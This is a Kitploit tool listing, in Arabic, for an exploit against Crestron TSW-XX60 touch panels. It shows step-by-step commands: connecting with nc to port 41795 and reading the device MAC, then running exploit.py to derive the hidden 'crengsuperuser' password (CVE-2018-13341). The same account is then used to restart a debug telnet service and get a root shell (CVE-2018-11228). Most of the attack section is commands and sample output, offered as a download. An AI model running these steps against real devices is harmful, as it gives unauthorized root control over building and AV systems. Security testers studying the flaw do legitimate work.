Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-13341 — تهدف هذه الأداة إلى استغلال CVE-2018-13341 | Kitploit
أدوات/GitHubGitHub/rajchowdhury240/cve-2018-13341
أمان الأنظمة المدمجةهجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمان الأجهزة وإنترنت الأشياء
GitHubrajchowdhury240/cve-2018-13341

CVE-2018-13341

تهدف هذه الأداة إلى استغلال CVE-2018-13341

عرض المستودع
منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2018-13341

تهدف هذه الأداة إلى استغلال الثغرة CVE-2018-13341، وذلك باستخدام عنوان MAC للجهاز المستهدف، يمكنك استعادة كلمة مرور الحساب المخفي "crengsuperuser" الذي يتمتع بصلاحيات مرتفعة ويسمح لك بتنفيذ أوامر SUDO (الجذر).

يمكن الاتصال ببروتوكول Crestron Toolbox Protocol (CTP) عبر المنفذ 41795 على جهاز TSW-XX60.

root@kitploit:~
# nc -C w.x.y.z 41795
TSW-760 Control Console

TSW-760> estat

The EST command has been made obsolete. Please use IPCONFIG instead.
Ethernet Adapter [XYZ]:
	Link Status ....... : OK
	DHCP .............. : ON
	MAC Address ....... : 00.XX.XX.XX.XX.XX
	IP Address ........ : [removed]
	Subnet Mask ....... : [removed]
	IPV6 Address ...... : [removed]
	Default Gateway ... : [removed]


	DNS Servers ........ : [removed]    | DHCP      |
	                       [removed]    | DHCP      |

المتطلبات

تتطلب هذه الأداة وحدة CryptoGraphy.

root@kitploit:~
# pip3 install cryptography

أو

root@kitploit:~
# pip3 install -r requirements.txt

بدء الاستخدام

root@kitploit:~
usage: exploit.py [-h] [-m MAC]


# مثال
# python3 exploit.py -m aabbccddeeff
[*] عنوان MAC للجهاز: AAXXYYZZ
[*] كلمة مرور 'crengsuperuser': somerandompass

استغلال الثغرة CVE-2018-11228

تسمح الثغرة CVE-2018-11228 بتنفيذ أوامر عن بعد غير موثّق عبر خدمة Bash Shell في بروتوكول Crestron Terminal Protocol (CTP). بعد الحصول على كلمة مرور الحساب المخفي "crengsuperuser" يمكنك الوصول إلى صلاحيات root على الجهاز.

root@kitploit:~
# nc -C w.x.y.z 41795

TSW-760 Control Console

TSW-760> TELNETPORT OFF
Telnet Port: Off
TSW-760> SUDO RESTARTSERVICE telnetd_debug
Username: crengsuperuser
Password: **************

Service telnetd_debug restarted

TSW-760>

ثم، في نافذة طرفية جديدة، يمكنك الوصول إلى صلاحيات root على الجهاز.

root@kitploit:~
# telnet w.x.y.z

bash# whoami
root
root@kitploit:~
يرجع الفضل إلى: axcheron
تنزيل الأداة